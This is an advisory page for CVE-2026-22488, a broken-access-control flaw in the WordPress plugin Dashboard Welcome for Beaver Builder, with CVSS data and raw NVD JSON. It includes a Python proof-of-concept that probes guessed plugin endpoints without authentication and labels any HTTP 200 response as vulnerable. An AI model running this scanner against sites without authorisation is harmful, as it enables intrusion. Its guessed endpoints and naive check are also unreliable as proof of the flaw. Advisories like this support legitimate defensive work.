Security Vulnerability Report
中文
CVE-2026-22488 CVSS 5.3 MEDIUM

CVE-2026-22488

Published: 2026-01-08 17:15:51
Last Modified: 2026-04-23 15:36:34

Description

Missing Authorization vulnerability in IdeaBox Creations Dashboard Welcome for Beaver Builder dashboard-welcome-for-beaver-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dashboard Welcome for Beaver Builder: from n/a through <= 1.0.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Dashboard Welcome for Beaver Builder <= 1.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22488 PoC - Missing Authorization in Dashboard Welcome for Beaver Builder # This PoC demonstrates the access control vulnerability import requests import sys TARGET_URL = "https://vulnerable-site.com" CVE_ID = "CVE-2026-22488" def check_vulnerability(): """ Check if the target WordPress site is vulnerable to CVE-2026-22488 Missing Authorization in Dashboard Welcome for Beaver Builder plugin """ # Common WordPress plugin endpoints that might be affected potential_endpoints = [ "/wp-json/dashboard-welcome/v1/settings", "/wp-admin/admin-ajax.php?action=dashboard_welcome_get_data", "/wp-admin/admin-ajax.php?action=dashboard_welcome_save_settings", "/wp-json/dashboard-welcome/v1/data", "/?rest_route=/dashboard-welcome/v1/settings" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) CVE-2026-22488-PoC", "Content-Type": "application/json" } print(f"[*] Testing target: {TARGET_URL}") print(f"[*] CVE: {CVE_ID}") print(f"[*] Vulnerability: Missing Authorization (Broken Access Control)") print("-" * 60) vulnerable = False for endpoint in potential_endpoints: url = TARGET_URL + endpoint try: # Send unauthenticated request response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if endpoint responds without authentication if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") else: print(f"[*] Unknown: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") print("-" * 60) if vulnerable: print(f"[!] Target is VULNERABLE to {CVE_ID}") print("[!] Recommendation: Update Dashboard Welcome for Beaver Builder to version > 1.0.8") return True else: print(f"[*] Target appears NOT vulnerable to {CVE_ID}") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22488", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:51.070", "lastModified": "2026-04-23T15:36:34.363", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in IdeaBox Creations Dashboard Welcome for Beaver Builder dashboard-welcome-for-beaver-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dashboard Welcome for Beaver Builder: from n/a through <= 1.0.8."}, {"lang": "es", "value": "Vulnerabilidad de Falta de Autorización en IdeaBox Creations Dashboard Welcome for Beaver Builder permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Dashboard Welcome for Beaver Builder: desde n/a hasta 1.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dashboard-welcome-for-beaver-builder/vulnerability/wordpress-dashboard-welcome-for-beaver-builder-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}